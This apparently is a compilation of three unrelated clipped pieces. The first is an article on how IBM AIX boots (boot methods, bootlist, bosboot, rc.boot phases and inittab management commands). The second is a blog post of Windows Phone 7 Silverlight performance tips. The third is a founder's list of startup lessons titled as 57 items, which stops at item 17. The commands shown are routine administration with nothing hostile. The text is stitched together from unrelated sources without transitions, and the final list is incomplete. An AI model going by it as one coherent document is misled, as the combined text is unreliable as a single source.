4/11/10

Speaking UNIX: Booting up

Discover how a UNIX machine boots

Adam Cormany (acormany@yahoo.com), National Data Center Manager, Scientific Games Corporation

Summary: Ever wonder what makes a computer tick or how a UNIX® server does what it does? For those who wonder what happens when you push the power button on your computer, here's your inside look. This article discusses the different boot types, managing the IBM® AIX® bootlist, and the AIX boot sequence. After reading this article, you should have a better understanding of what exactly is happening when your server starts.

Table of contents
* Introduction
* The AIX boot method
* The bootlist and how to manage it
* The AIX boot sequence
* The AIX kernel
* The /etc/inittab file
* Conclusion
* Resources
* About the author
* Comments

Introduction

The AIX operating system is the particular IBM flavor of UNIX. IBM first released AIX in 1986 as AIX version 1.0 and, through several iterations over the past 22 years (AIX version 6.1 was the latest version at the time of writing), AIX has matured into a solid UNIX system.

While many interchange the terms AIX and RS/6000, they are not the same thing. AIX is the UNIX operating system; IBM RS/6000® is the reduced instruction set computer (RISC) server hardware that AIX can run on. IBM initially launched AIX on the IBM 6150 RT workstation; through the years, AIX has progressed through IBM PS/2 Intel® 386 computers, IBM mainframes, and the POWER architecture. AIX now runs on IBM System p™ (formerly known as RS/6000) and System i™ (formerly known as IBM iSeries® and AS/400®) computers.

The AIX boot method

There are three ways to boot the AIX operating system: normal, stand-alone, and network boot.

Normal boot
The typical AIX boot method is the normal boot option, which boots AIX from disks local to the server. When the boot completes, the operating system is in multi-user mode.

Stand-alone boot
The next type of boot on an AIX system is called the stand-alone boot, or maintenance mode, option. The stand-alone boot option is similar to the normal boot option, but instead of coming up in multi-user mode, the system comes up in single-user maintenance mode. You can stand-alone boot an AIX system in several ways: by booting the server from removable media (tape or CD), by pressing F5 (or F6, depending on the hardware) after the keyboard has been initialized during the initial hardware peripheral checks, or automatically when a possible issue has been found (such as a corrupt file system) and the system must be repaired before it can complete a normal boot. Some systems also have a physical key that you can turn to maintenance mode. Stand-alone booting the server allows you to install software, correct issues, run diagnostics, and configure hardware without other users on the system, reducing the risk of locked resources.

Network boot
The last type of boot is the network boot option. Again, similar to the normal boot option, the AIX system is booted into a multi-user mode. However, with this option, AIX receives its boot information from another server on the network.

The bootlist and how to manage it

Because you can boot AIX from several different types of media, you must have a way to manage the different types. This is where the bootlist comes into play. The bootlist maintains a list of all boot devices available to the system for each boot method.

To view the bootlist for a specific boot method, run the bootlist command with the -m switch for that boot method and add the -o switch. In the following example, the bootlist for the normal boot method is displayed. The order in which the server will try to boot is the first local disk (hdisk0), then the CD drive (cd0), and finally the tape drive (rmt0).
# bootlist -m normal -o
hdisk0
cd0
rmt0
To set the bootlist for a specific boot method, type the switch -m and the appropriate boot method followed by the desired boot devices. In the following example, the bootlist for a normal boot is altered to attempt to boot the server in the order of hdisk0, cd0, or cd1:
bootlist -m normal hdisk0 cd0 cd1
As you can see from the previous examples, the -m switch has been used each time to discern which boot method to modify or display. This option allows modification to normal, service (single-user maintenance mode), both (normal and service), and prevboot (the previous bootlist).
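For example, to display the current service (maintenance) bootlist and then change it to try the CD drive, tape drive, and first disk in that order, you could run commands like the following (the device names are only illustrative; use the devices present on your own system):
bootlist -m service -o
bootlist -m service cd0 rmt0 hdisk0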

The AIX boot sequence
Now that you've selected the boot method, it's time to move to the actual sequence of events that occurs after the server is powered on.
Note: Throughout the rest of this article, you'll boot the server using normal boot mode.

POST
After you've turned on the power and the server is starting, the server's hardware is verified and checked for possible issues. This step is called the power-on self-test (POST). During this process, POST checks the memory, keyboard, sound card, and network devices. If you wanted to enter stand-alone mode (single-user maintenance), this is when you would press F5 or F6, after the keyboard has been initialized. However, in this article, no keystrokes are entered, and the server boots into its normal boot mode.

Bootstrap
After the POST process has finished, the bootstrap (a small program whose job is to load a larger program) is loaded into memory. The bootstrap then loads the Boot Logical Volume (BLV) into memory. After the BLV is loaded, the kernel takes over the boot process.

Boot Logical Volume and the bosboot command
The BLV is the location that contains AIX's bootable images. Typically, the BLV can be found on the local disk of the server. The BLV contains the AIX kernel, the rc.boot file, commands required during the boot process, and a trimmed-down version of the Object Data Manager (ODM).

To create bootable images, you use the bosboot command. Using bosboot, you create a boot file (that is, a bootable image) from a RAM disk, a file system, and a kernel. The bootable image that is created interfaces with the server's boot Read-Only Storage (ROS) and Erasable Programmable Read-Only Memory (EPROM).

The following example shows how to create a bootable image on the default BLV on the local fixed disk from which the system boots:
bosboot -a
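If you need to create the boot image on a particular device rather than the default boot disk, bosboot also accepts the -d flag followed by the device name, as in the following example (hdisk0 is only an illustrative device name):
bosboot -ad /dev/hdisk0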

The AIX kernel
The AIX kernel stored in the BLV creates the / (root), /usr, and /var file systems in RAM. Keep in mind that these file systems as well as the kernel are stored in RAM initially during the operating system boot process. Because they are in RAM, they are not accessible to anything outside the BLV.

After the file systems have been loaded into RAM, the kernel executes the init process, which now takes over the boot process.

The init process
The AIX kernel loads the process init as process identifier (PID) 1. This process is the parent, or root, process to all other processes running on AIX. After the init process has been loaded and is running the boot process, init calls rc.boot.

The rc.boot file
The rc.boot file has three important phases of execution during the AIX boot-up process. The first phase of rc.boot initializes the system's hardware to prepare it for the operating system to boot. Only the limited set of devices needed to start the system is configured at this time with the Configuration Manager command cfgmgr.

During the second phase of rc.boot, the /, /usr, and /var file systems, as well as the paging space, are mounted. After these file systems have been mounted, the RAM-based init is replaced as PID 1 by the init located on disk, and the RAM file system is cleared.

In the third and final phase of rc.boot, the actual init process is executed from disk. When init is executed, the /etc/inittab file is read, and each item is executed. During this time, the /tmp file system is mounted on disk. Now that the system is in the last leg of the boot process, the cfgmgr command is run again to configure the remaining devices that were not configured in the first phase of rc.boot.

The /etc/inittab file

After the init process has been executed, the next step is for init to open /etc/inittab and read each entry. The purpose of the /etc/inittab file is to tell the init process which processes to start at boot-up and during normal operation.

The format of the /etc/inittab file is very specific: each entry is a single line made up of colon-delimited fields, as follows:
ID:Run Level:Action:Command
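For example, the entry that sets the system's default run level on a typical AIX installation looks similar to this:
init:2:initdefault: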

The descriptions for the fields defined in the /etc/inittab file are:
* ID: A unique string that identifies the object.
* Run Level: The init level (or levels) at which the entry is executed. For example, if an entry in /etc/inittab is set to have a run level of 2, the command is executed when the operating system enters init level 2.

The init, or run, levels on AIX differ from those on other UNIX- or Linux®-based systems. The following run levels are defined in AIX:
o 0 and 1: Reserved for future operating system expansion
o 2: Default run level
o 3 through 9: User-definable
o a through c: Unique levels (When init is executed to a run level a, b, or c, processes are not killed. Processes in these run levels that are not running will be executed, but processes from the previous run level are not touched.)
o Q, q: A quick way to tell init to rescan the /etc/inittab file
* Action: The action field tells the init process how to treat the process in each respective entry in the inittab file. The following are values to the action field that AIX uses:
o respawn: If the process doesn't exist, start the process. Do not wait for its termination, and continue to scan the inittab file. If the process is terminated, restart it.
o wait: Start the process, and wait for its termination.
o once: Start the process, and do not wait for its termination. If the process is terminated, do not restart it.
o boot: Process the entry only during system boot.
o bootwait: Process the entry the first time the server goes from single-user to multi-user mode.
o powerfail: Only execute the command if init receives a power fail signal.
o powerwait: Only execute the command if init receives a power fail signal, and wait until the process terminates before continuing to scan the inittab file.
o off: If the process is currently running, send the signal SIGTERM, then SIGKILL in 20 seconds.
o ondemand: This value is the same as respawn but applies only to run levels a, b, and c.
o initdefault: The entry is scanned only when init is initially invoked; init uses this entry to determine which run level to enter initially.
o sysinit: Execute the entry before init accesses the console before login.
* Command: The final field in an /etc/inittab entry is the command field. This is the actual command that init executes when the entry's run level has been initiated and its action calls for it. When the command is ready to be executed, AIX forks the process as sh -c 'exec command'.

The following example starts a shell script named /usr/bin/rc.atc_bin when run level 2 is initiated and, because of the respawn action, restarts it if it ever stops while the system remains at run level 2:
CORMANY_BIN:2:respawn:/usr/bin/rc.atc_bin

To run the same script only at run levels 2, 4, 5, 7, 8, and 0 (that is, to disable it for run levels 1, 3, 6, and 9), use:
CORMANY_BIN:245780:respawn:/usr/bin/rc.atc_bin

Viewing and modifying the inittab
Rather than having you manually edit the /etc/inittab file, AIX provides commands to make your life easier. The commands follow the same naming convention as other AIX commands:

* mkitab: Add records to the inittab file.
The following example adds the /usr/bin/rc.atc_bin script to the inittab file with a run level of 2:
mkitab "CORMANY_BIN:2:respawn:/usr/bin/rc.atc_bin"

* chitab: Changes records in the inittab file. The syntax is identical to the actual record in the inittab file.
The following example changes the previous example's /usr/bin/rc.atc_bin script in the inittab file to run level 3:
chitab "CORMANY_BIN:3:respawn:/usr/bin/rc.atc_bin"

* lsitab: List records in the inittab file. Using lsitab is a safe means of viewing the inittab records individually or all together.
The following example views all records in the inittab file:
lsitab -a
This example views only the record identified as CORMANY_BIN:
lsitab CORMANY_BIN

* rmitab: Remove records from the inittab file.
The following example removes the record identified by CORMANY_BIN from the inittab file:
rmitab CORMANY_BIN

Conclusion
Now that the inittab file has been read and all the proper processes have been executed, the system is at a login prompt waiting for you! You may now log in and enjoy your AIX system.

It may not seem like much when you press the power button on a server and it magically starts up, but as you can see, a lot is going on as an AIX system starts. Hopefully, by reading this article you have gained a new appreciation of what AIX has to go through to provide the base of a solid operating system.

Resources
Learn
* Speaking UNIX: Check out other parts in this series
* Wikipedia's AIX entry: Read Wikipedia's excellent entry on the AIX operating system for more information about its background and development.
* inittab file information: Learn more about the inittab file from the Combined IBM Systems Information Center.
* The AIX and UNIX developerWorks zone provides a wealth of information relating to all aspects of IBM® AIX® systems administration and expanding your UNIX skills.
* New to AIX and UNIX? Visit the New to AIX and UNIX page to learn more.
* developerWorks technical events and webcasts: Stay current with developerWorks technical events and webcasts.
* AIX Wiki: Visit this collaborative environment for technical information related to AIX.
* Podcasts: Tune in and catch up with IBM technical experts.

Get products and technologies
* IBM trial software: Build your next development project with software for download directly from developerWorks.

Discuss
* Participate in the AIX and UNIX forums:
o AIX Forum
o AIX Forum for developers
o Cluster Systems Management
o IBM Support Assistant Forum
o Performance Tools Forum
o Virtualization Forum
o More AIX and UNIX Forums

1/11/10

WP7 Development Tips Part 1

Performance is the area that we probably spend the most time on in all our apps. Building apps on the phone is just way different than building desktop apps. Things that might be really minor optimizations in desktop Silverlight can really make a difference in a phone Silverlight app.

Developing on the phone is an issue of economics where processing power is a scarce resource. You have to be conscious of the tradeoffs of using things like binding, layout controls, dependency injection, etc with their impact on performance. When I first started building phone apps I was excited to use nRoute and its nice features around MVVM/Resource Location/Messaging/Navigation. I wanted to have this really perfect loosely coupled architecture that used binding for everything/minimal code behind, had great designer support and dynamically resolved the proper services and models. In practice, that is not generally high performance code on the phone. If you are using some extra frameworks, really be conscious of the impact on performance and decide if you really need that architecture. What might work wonderfully on a more complicated desktop line of business app might not work as well on the phone. You just have to expect to write more optimization code in a mobile app regardless of whether it’s the iphone, wp7 or android.

Silverlight was billed as “same Silverlight, just on the phone”. That is mostly true in terms of the api, but not necessarily true in terms of the actual runtime. It’s really a brand new runtime based on Silverlight 3 with some extra features added, so certain pieces of code might not have the same performance characteristics.

I’ve seen a lot of articles from various other people that talk about “buttery smooth scrolling” and other performance tips. At times the tips are a little too generalized. When you try to optimize something for performance on the phone, you really need to take into account your specific circumstances and find the right combination that works for your app. Always test and benchmark. Some things are more difficult to measure without real profiling tools, but do the best you can. Also be aware that scrolling in 3rd party apps on the phone is just not great at the moment. The native OS apps use a different UI framework that is going to make all but the simplest 3rd party apps feel sluggish so don’t feel too bad if your app scrolling seems slower. It’s probably not entirely your fault. Although this guy (around 8:50) seems to disagree. Sure 3rd party apps will get better with more experience and time, but the runtime needs to also get better. It’s the v1 of a new platform for everyone.

Finally, most of my thoughts are based around apps like twitter or facebook or other apps that require lots of live network data and have more complicated/longer list based screens. A 2 screen unit converter app is just going to be faster because it’s a simpler app and you don’t really need to optimize much.

So here are some things that you can think about for your application:

•Data binding is always going to be slower than just directly setting a value. If you don’t have to databind, try to avoid it. I see lots of people going out of their way to MVVM everything and create bindable app bars. Feel free to just wire up a handler once in a while or just directly set some text. There are other ways of centralizing code for reuse instead of trying to adhere to a strict pattern. If you are trying to animate in a screen and data bind simultaneously, most of the animations will get chopped. Just directly set enough pieces of data to have something to animate in and then you can do more intensive data binding after the animation is complete.
•As mentioned above – consider the tradeoff of always following the same pattern just for the sake of maintaining the pattern. Sure it might be easier to maintain, but high performance code doesn’t always look pretty. Be flexible, take shortcuts and do what makes sense for a specific part of the application. That’s not to say you should ever write bad code, just don’t focus on creating an architectural masterpiece in lieu of something that performs well. The end user only sees what you put on screen, not the code behind it. They don’t really care that you used MEF and have an awesome messaging framework. When I see people over-engineer what should be a simple app just to adhere to some theoretical best practices I get sad.
•Converters slow your app. It’s better to just create the specific properties needed on your model. It’s a minor optimization, but it adds up on the phone.
•Template expansion is slow. If you have a listbox where the item templates have lots of visibility converters, it’s going to be inefficient for a few reasons. First, you pay the perf hit of parsing a template for an item that is just going to be collapsed anyway. Plus you ran it through a bound converter which is slower. To optimize better you can do a few things:
◦If you can cut down visuals in a list, that is always the first place to start. If not every item in the list can use the same fixed template, consider making the list more of a summary and then link to a detail screen. The Twitter app does this nicely to avoid parsing hyperlinks in the text or showing attached photos. (because of how virtualizing stack panel works, it’s always better to have fixed height items that use the same template) Facebook on the other hand parses text for hyperlinks, which is slower because it needs to reassemble the text in a wrap panel of multiple controls and the regexing is slow, but that is more in line with the user’s expectation of the facebook experience.
◦If you have to have variable templates, make the list item a custom control and have the control dynamically create specific visuals needed for the list item so you don’t do extra layout work. Plus you eliminate converters and other extra data binding since you only have to bind one data property. Creating in code is faster than parsing the extra xaml. Obviously this comes at a maintenance penalty and you don't get designer support, but for those of us that don’t use blend or the designer view, not so much of an issue. Although inside your control you need to keep references to UI elements that you create and reuse as your entire control is recycled by the VSP. Otherwise you lose the benefit of caching that the listbox would normally do. Just make sure you are binding the list to a model that fires PropertyChanged notifications and you can hook that inside your control and update the UI elements as your control recycles.
◦It might seem crazy to not use xaml or databind but in places where we create most of the UI in code we get about 15-20% performance boost.
•Panoramas are slower than pivots because pivots only create the adjacent pivot items, while the pano creates all the items. Panos are nice, but consider the performance implications and don’t use unless there is a good UX reason. A lot of apps use a pano just because it’s there and looks cool but a pivot would probably make more sense and end up being faster.
◦To optimize the pano, defer loading of non-adjacent pano items. If you have 5 pano items, you only need to initially load the content in the first one and the 2nd one because those are visible on screen (and maybe the last if you want to have data there as soon as the user pans backward from the first item). Defer loading of the content in the 3rd one until the user pans to the 2nd one or the 4th one (going in reverse). Same for the 4th one. You could be more extreme and fetch the data for the last one and not bind it until the user actually pans to it since it’s not actually visible when on the first pano item. The overall gains are going to depend on the complexity of the visuals you are loading. Try to keep it simple on the pano.
◦Pivots are more efficient because they only load adjacent pivot items regardless of the total number of pivots. To improve startup even further, consider collapsing the content inside all but the initial pivot item to avoid even loading the adjacent ones on startup. On loading other pivot items you can uncollapse the content and let it data bind. You will still get the slide in animation. It will be slightly slower to see actual content, but you can overlay a simple loading message so the user sees something. This also improves responsiveness of clicking the pivot headers. We have been using a base page that has a Pivot property so any pages in the app set the pivot property and the base page takes care of uncollapsing the content.
•If you are using a progress bar, make sure you read this http://www.jeff.wilcox.name/2010/08/progressbarperftips2/
•Use HttpWebRequest over WebClient. WebClient always returns on the UI thread. Ideally you want to return on a background thread, do any parsing and then dispatcher begininvoke to bind on the UI thread.
•DataContractJsonSerializer is slower than Json.NET. Switching to Json.Net cut our JSON parsing time in half. That is almost insane. Ideally you want to do this on a background thread as mentioned above.
•If you can make network calls that have both JSON and XML responses, choose JSON. The size of the response is smaller which speeds up network calls and you can use the faster Json.net parser. Also try to return the minimum set of data needed.
•If you are serializing objects to isolated storage, consider implementing binary serialization instead of XML or JSON. It’s more work to maintain and a pain to implement if you have complicated object graphs, but the performance difference is tremendous. In one of our apps going from DataContractSerializer to Json.NET to binary improved our iso cache deserialization from 7000ms to 3000ms to 300ms. If you want that data on startup it’s pretty much a necessity.
•Image downloading / decoding is basically kryptonite to a listbox. Binding a list of 100 items with thumbnail or other pictures will make your listbox fairly unresponsive and scrolling performance will be borderline unusable. Right now in the framework all image downloading is on the UI thread and decoding does not seem to be optimized as much as it could be. David Anson’s LowProfileImageLoader code is a must implement for this scenario. That will download all the images on a background thread and offloads everything that does not need to be done on the UI thread. One issue is that the Image control normally caches after it downloads. We have been adding extra code to keep a memory cache of the bitmap sources. Just make sure you put some cap on the size of the cache so it’s not using too much of your 90MB cap. We use 4MB. It helps to limit the sizes of images that are memory cached. You can check the pixel width / height and only mem cache images under something like 200x200. You can also cache images to iso storage after you download them. Maybe use that for larger images or ones that will not change over the course of a day. Like if you have a news reader app, there is no sense downloading the images for your top 10 stories every time you launch the app in a day. You will have to have some extra maintenance code so balance how frequently you need to fetch the same images vs the overhead of maintaining a disk cache. At a minimum you can cache large images for the lifetime of your app and just clear the directory on closing. Another optimization you can make is to hook scrolling events and pause the background download thread when scrolling a list. This helps scroll performance. If you queue up images you might need to reverse the queue when you stop scrolling so the most recently added images load first.
•Try to use jpgs over pngs. The jpg decoder is much faster. Also try to avoid stretching images – if you control the image source, resize them before using in your app – you really don’t want the phone to do any more than it has to.
•When referencing image paths, always use /Directory/filename. If you omit the leading slash, the framework will do extra lookups.
•For certain listboxes evaluate the difference between virtualizing and non-virtualizing stack panels. If you have a huge list you obviously need to use a virtualizing stack panel. Stackpanels have a slower startup time, but scrolling perf is going to be better. Virtualizing stack panels create about 3 screens of data, but work best when they can fully recycle containers. If you have varying sized items and different containers you lose the benefits of virtualization and have worse scrolling. David Anson has some good code around using a stack panel instead of a virtualizing stack panel that gives you the best of both so see if that might be right for your app.
•If you use the tilt effect, make sure you turn on redraw regions and cache visualization to ensure it’s not adversely impacting your app. The tilt effect seems to invalidate the layout and slow down scrolling performance.
•Also be wary of context menu and the impact on scrolling perf. The runtime has to create the context menu control and attach all the bindings. Not that you shouldn’t use it, but just be aware that there are some performance implications.
•Layout is expensive. Make sure you use the simplest set of xaml to create the desired layout. Try not to nest lots of panels. If you can, use canvases as much as possible and fixed-size items. Help the runtime out, set a height / width if you can. Otherwise try to keep it to a single grid with multiple rows / columns. Nesting panels requires the layout engine to do more layout passes to measure. Especially on leaf nodes like items in a list box it’s best if you can use a fixed sized canvas. Extra/less efficient xaml that normally wouldn’t make a difference on the desktop has a much larger impact on the phone.
•Microsoft wants apps to run at 60fps on the compositor thread. That is a good goal but it is hard to achieve when a) the UI thread is easily bogged down with layout / binding which hurts the compositor thread perf and b) I’m not sure all the LG phones are even capable of 60fps. Realistically try to keep it as far above 30 as you can.
•Some people say to only use dispatcher.begininvoke when you must. I think there are times when you can use it to queue up visual changes that give the app a smoother appearance.
•Make sure your animations run on the GPU– only use transforms and opacity. If you add other animations in there it will force your storyboard off the compositor thread.
•Content in a popup is not hardware accelerated. If you try to animate stuff in a popup, it will be slow. If you need to mimic popup like functionality, consider re-templating the PhoneApplicationFrame to wrap the contentpresenter in a grid and place a contentpresenter below it to act as a placeholder for a fake popup. You can then write a popup manager to insert whatever child you previously had in a popup into the content presenter/fake popup. This allows you to have better perf on the content in the popup and you can have smoother animations for sliding / flipping the popup into place.
•For binding lists make sure you use observable collections. If you are refreshing a list make sure you merge in changes to minimize the amount of binding updates that occur. It’s more efficient to specifically update individual properties / items that have changed. In your model you can make sure the PropertyChanged notification only occurs when the property has an updated value.
•Since updating large parts of the layout makes the UI somewhat unresponsive, try batching changes. For example if you bind a list to an observable collection, fetch data on a background thread, dispatcher 2 items into the collection, sleep for a few milliseconds and repeat. This will give the UI thread some time to better respond to input. The effect varies depending on your list. Sometimes it just further spreads out the layout costs and it’s worse. You really need to test on a device and determine what feels better. This code is a good example.
•Read the metro UI guidelines. WP7 has a refreshing distinct style. Let’s avoid bad iPhone ports aka the Android marketplace
•Always watch the memory counters. If you get close to 90MB you will have issues. At that point start removing any extra items you may be storing in memory.
•Design an application that requires the user to click the back button. If you have a pano as your home screen, don't add buttons on other screens to jump back to that home screen unless you are going to programmatically call goback() until you get to that screen. (you could show some splash screen and do this, but I wouldn’t recommend the UX) The issue is that if you always forward navigate you will never clear the back stack and your app will run out of memory because the previous pages stick around. If you start navigating between panos with lots of textures your app will die quickly. Peter Torr has a post around determining what should be a new page which might cut down on page navigations and improve performance. Quick Rant: I really dislike the back button model most of the time. I think it imposes a navigation structure that doesn’t always make sense. If you have a tree structure like navigation, you can’t easily jump between leaf nodes and back to the root. There really needs to be a way to clear the back stack programmatically. Even web browsers allow you to return to any previous point in the back stack by long pressing the back button. The wp7 model forces you to click back through each page which is annoying in my opinion. Oh and the framework needs the ability to programmatically exit an app. Lots of apps require separate EULAs to use. Why can’t it exit if you don’t accept it?
•I know it’s still a little difficult to acquire a phone, but you have to test on a device. The performance characteristics are enormously different. Almost everything is WAY faster in the emulator.
•Always run through your app and check the fill rate. Try to keep it under 2.5. At 3.5 it will run like junk. If your fill rate is high, use this helper by Dave Relyea (I think it was from him) to dump out the visual tree and see what is contributing to the fill rate. You just need to call TreeHelper.Dump() and it will output the visual tree to the console window along with its texture size. You can import this into Excel and sort to find any items that might be contributing unnecessarily to fill rate.
•If you are using system themes you can further optimize the fill rate – just make sure you don’t paint a background at all. That will drop your fill rate by 1. If you want an app to always be black or white, you can put something on app startup to detect the system theme like:
public static Theme GetTheme(this Application application)
{
    var visibility = (Visibility)Application.Current.Resources["PhoneLightThemeVisibility"];
    return (visibility == Visibility.Visible) ? Theme.Light : Theme.Dark;
}

Then if the theme is white and you want your app to be white, you don’t have to paint a background and vice versa. To do this I have been painting the background on the root frame. This has the added benefit of not displaying the OS background if you are turnstiling pages in/out. Silverlight should really let you tell the OS what background to paint for your app. It has to paint something. It might as well paint the background color you want.

•Set the app bar opacity to .99 to avoid seeing the OS background bleed through when the app bar animates on/off the screen. Since an app bar with opacity of 1 bumps up the client area, you will see the OS background when the app bar animates away on page transitions. If you do this, you will need to either prevent the layout root from extending into the app bar space or add a spacer element at the bottom. (Otherwise your content will go under the app bar and you will see it through the opacity; plus it will prevent the bottom most content from scrolling onto the screen.) Might seem like a hassle, but I think it looks terrible when an app bar on a dark theme phone animates away and you see this giant black bar for a second.
•Lots of people say don’t use maps in panos/pivots. I think it’s fine as long as they aren’t enabled else the gesture interaction is weird. One issue is that the map is drawn differently than other Silverlight controls so it will render over other content if you have it in a scrollviewer. In that case you can let the map render and on the mapresolved event, take a writable bitmap of the map, remove the map from the visual tree and replace with the image of the map.
•The map control that shipped in the release SDK crashes all the time. Definitely update to one released a few days ago. I don’t know how anyone used it before.
•The web browser launcher tombstones your app and really ruins the UX of your app if you just want to view a quick web page. Consider overlaying in a web browser control and adding an app bar button to open in IE. That or make a setting to either open links in IE or in the app. Or use the long press gesture on a hyperlink to open in IE otherwise open in the app.
•If you want to opt out of system theming, make sure you look at the resources in %ProgramFiles%\Microsoft SDKs\Windows Phone\v7.0\Design\ to clone the font styling and templates to match the default styles but with your own colors.
•The default template for the pivot control doesn’t match the OS style. It should be PhoneFontSizeMedium, PhoneFontFamilySemiBold
•In most of our network calls we have two callbacks, one for cached data and one for live data. Our data services maintain a dictionary cache of the results keyed by request path, return the cached result, get the new data, update the cache and then return the new results. We then merge the refreshed callback results into the ObservableCollection with the cached data. This allows screens to load faster on subsequent calls.
•On navigating back to a page, you don’t have to rebind / reload data unless you did something on the previous page that requires an update.
•Set all images in your app to be content instead of resources so they are not loaded at startup. This will improve startup performance.
•Regardless of what anyone says, “buttery smooth” scrolling like the native apps is nearly impossible to achieve in silverlight at the moment. If you make a listbox of 200 hard coded textblocks and flick up and down quickly, the screen will just flash and not render content. Either the virtualizing stack panel has some issues buffering or the garbage collector is kicking in and causing issues. I’m sure it will get fixed soon, but it’s an issue to be aware of. The only real way to fix the problem is to only have short lists with minimal templates and ideally no images.
•Textblocks with opacity = 0 cause performance problems. You really should avoid that in listboxes.
•If you use the GPS, create a singleton class to instantiate the geowatcher and keep it around. Rather than disposing, just turn it on/off.
•If you have really long lists, consider virtualizing the data. Shawn Oster has a good post on that. If you look at the marketplace on the phone it downloads about 20 items and then downloads more when you scroll to the bottom of the list. This will make the list load faster initially and cuts down on downloading / rendering data that might not be needed. Another option is to add a load more button at the bottom of the list.
•It’s really important to minimize work on the UI thread as much as possible since the touch recognition happens on the UI thread and will get dropped if the processor is maxed out. Don’t do anything on the UI thread that is not directly related to setting / manipulating a UI element. Well you can do some things, but really try to background as many chunks of work as you can.
•Some apps like the people hub scroll the header with the list and have a footer. If you try to retemplate listbox and insert a header and footer around the itemscontrol inside the scrollviewer, you will lose virtualization. There are a few ways you can accomplish this while maintaining virtualization.
◦Easiest is to bind to a list/collection of objects and insert dummy items for the header and footer. You can then inherit from listbox and make your own that has a template property for header and footer. In PrepareContainerForItemOverride you can check if it’s a header / footer object and apply the right template.
◦If you don’t want to create all these collections with dummy objects, you could internalize the collection to your own listbox. Instead of binding your normal collection to itemssource, add a new property called datasource, bind to that and hook into the collection changed events to mirror the changes in your own internal collection. Then you can bind that internal collection and add your own header / footer items to the collection. This also allows you to easily add some “Loading data” message or “No data” message.
◦Talking to some other people, I have learned that this might not be very performant because it breaks some of the container recycling. The alternative is to not override PrepareContainerForItemOverride and instead have one template and change the visibility on the non header/footer items. This is one of those things that you have to try out and see for yourself.
•Focus on making the app respond to input as soon as possible. You need to do something immediately when the user takes some action. If the content will take some time to load, at least transition to it and display a loading indicator. An example would be a popup that slides in with a list of items. If the list is somewhat complex and does not render immediately, there will be a noticeable lag between the user action and the response. Slide up the list with a header and loading indicator, then data bind the list. It will feel more responsive.
•I wrote previously about transitions. You should design the app with transitions in mind and be conscious of why certain animations are useful for context and perceived performance. It does seem like this should be easier to do since animation is a big part of the metro design.
•Spend some time to review the hit targets of your elements. 40x40 seems to accommodate an adult finger reasonably well. Remember to keep a reasonable amount of spacing between hit areas. You really need to think about this when designing an application. With a mouse you can click on a specific point. On the phone you need to account for the size of your finger. You want to avoid having users click the wrong things, navigating to a screen, then having to navigate back.
•If you have a pivot with 4 items and you save the selected index on tombstoning you can’t always set the selected index immediately in OnNavigatedTo. The pivot creates the first, 2nd and last items. Setting the selected index to the 3rd pivot will throw an exception. If you have more than 3 pivots and you need to set the selected index, grab the index out of the page state in OnNavigatedTo, store it in a variable and set it in the page loaded event.
•You can always check PhoneApplicationService.Current.StartupMode == Activated to check whether you are returning from a tombstone. The whole concept of tombstoning could be my least favorite #wp7dev feature besides the navigation framework and scrolling performance. I really don’t understand why this is something developers should have to worry about. If the phone wants to tombstone my app, put it back the way it was when you’re done. Also be aware when launchers/choosers are going to tombstone your app or any other side effects when returning from them.
•There are lots of different keyboard layouts (SIP). Use the right one for your text entry needs. You can optimize for web addresses, email, phone numbers, text (for dictionary suggestions) and search. One thing is that the search key is not super obvious in my opinion. You can use the app bar to augment the SIP by adding more specific buttons like upload photo, etc.
•There is currently no socket support so implementing something like a chat client is difficult. *cough* facebook chat *cough*
•If you want your pages to load quickly, don’t do anything before the first layout updated event after loaded is fired. Then defer loading things until they need to be shown.
•There is no launcher for the bing maps app. If you want to display driving directions you need to call the virtual earth web service to get the data (or whatever other map service you might prefer)
•There is also no compass api, no direct camera access (so therefore no augmented reality unless you are a handset maker like LG and have native code access), no Bluetooth api, no ability to add events to the system calendar, no video chooser (thus no ability to upload videos in your app), no ability to customize alert dialogs to match your app if you opt out of theming, no ability to run in the background (you can have your app run under the lock screen though), no copy paste (coming soon and hopefully 3rd party app support), no ability to alter the back stack, no gif decoding support (try ImageTools if you need to display gifs). I’m probably missing a few things that I would like to use but are not supported. Despite all that, I’d still rather use visual studio / c# than Xcode/obj-c. I do think the silverlight team did a great job getting it on the phone. It really is one of the better frameworks for building UX centric apps and the silverlight team has been really helpful in tracking down issues we’ve encountered.
I’ll be at PDC if anyone would like to chat about #wp7dev

57 things Jason Goldberg learned founding 3 tech companies

The wise would read his words well.

I’ve been founding and helping run technology companies since 1999. My latest company is fabulis.com. Here are 57 lessons I’ve learned along the way. I could have listed 100+ but I didn’t want to bore you.

1. Build something you are personally passionate about. You are your best focus group.

2. User experience matters a lot. Most products that fail do so because users don’t understand how to get value from them. Many products fail by being too complex.

3. Be technical. You don’t have to write code but you do have to understand how it is built and how it works.

4. The CEO of a startup must, must, must be the product manager. He/she must own the functional user experience.

5. Stack rank your features. No two features are ever created equal. You can’t do everything all at once. Force prioritization.

6. Use a bug tracking system and religiously manage development action items from it.

7. Ship it. You’ll never know how good your product is until real people touch it and give you feedback.

8. Ship it fast and ship it often. Don’t worry about adding that extra feature. Ship the bare minimum feature set required in order to start gathering user feedback. Get feedback, repeat the process, and ship the next version and the next version as quickly as possible. If you’re taking more than 3 months to launch your first consumer-facing product, you’re taking too long. If you’re taking more than 3 weeks to ship updates, you’re taking too long. Ship small stuff weekly, if not several times per week. Ship significant releases in 3 week intervals.

9. The only thing that matters is how good your product is. All the rest is noise.

10. The only judge of how good your product is is how much your users use it.

11. Therefore (adding #’s 9 + 10): In the early days the key determinant of your future success is traction. Spend the majority of your time figuring out how to cultivate pockets of traction amongst your early adopters and optimize around that traction. Traction begets more traction if you are able to jump on it.

12. You’re doing really well if 50% of what you originally planned on doing turns out to actually work. Follow your users as much as possible.

13. But don’t rely on focus groups to tell you what to build. Focus groups can tell you what to fix and help you identify potentially interesting kernels for you to hone in on, but you still need to figure out how to synthesize such input and where to take your users.

14. Most people really only heavily use about 5 to 7 services. If you want to be an important product and a big business, you will need to figure out how to fit into one of those 5 to 7 services, which means capturing your user’s fascination, enthusiasm, and trust. You need to give your users a real reason to add you into their time.

15. Try to ride an existing wave vs. creating your own market. If you can, catch onto an emerging macro trend and ride it.

16. Find yourself a “sherpa.” This is someone who has done it before — raised money, done deals, worked with startups. Give this person 1 to 2% of your company in exchange for their time. Rely on them to open doors to future investors. Use them as a sounding board for corporate development issues. Don’t do this by committee. Advisory boards never amount to much. Find one person, make them your sherpa, and lean on them.

17. Work with the best possible people for your project, regardless of where they are located.

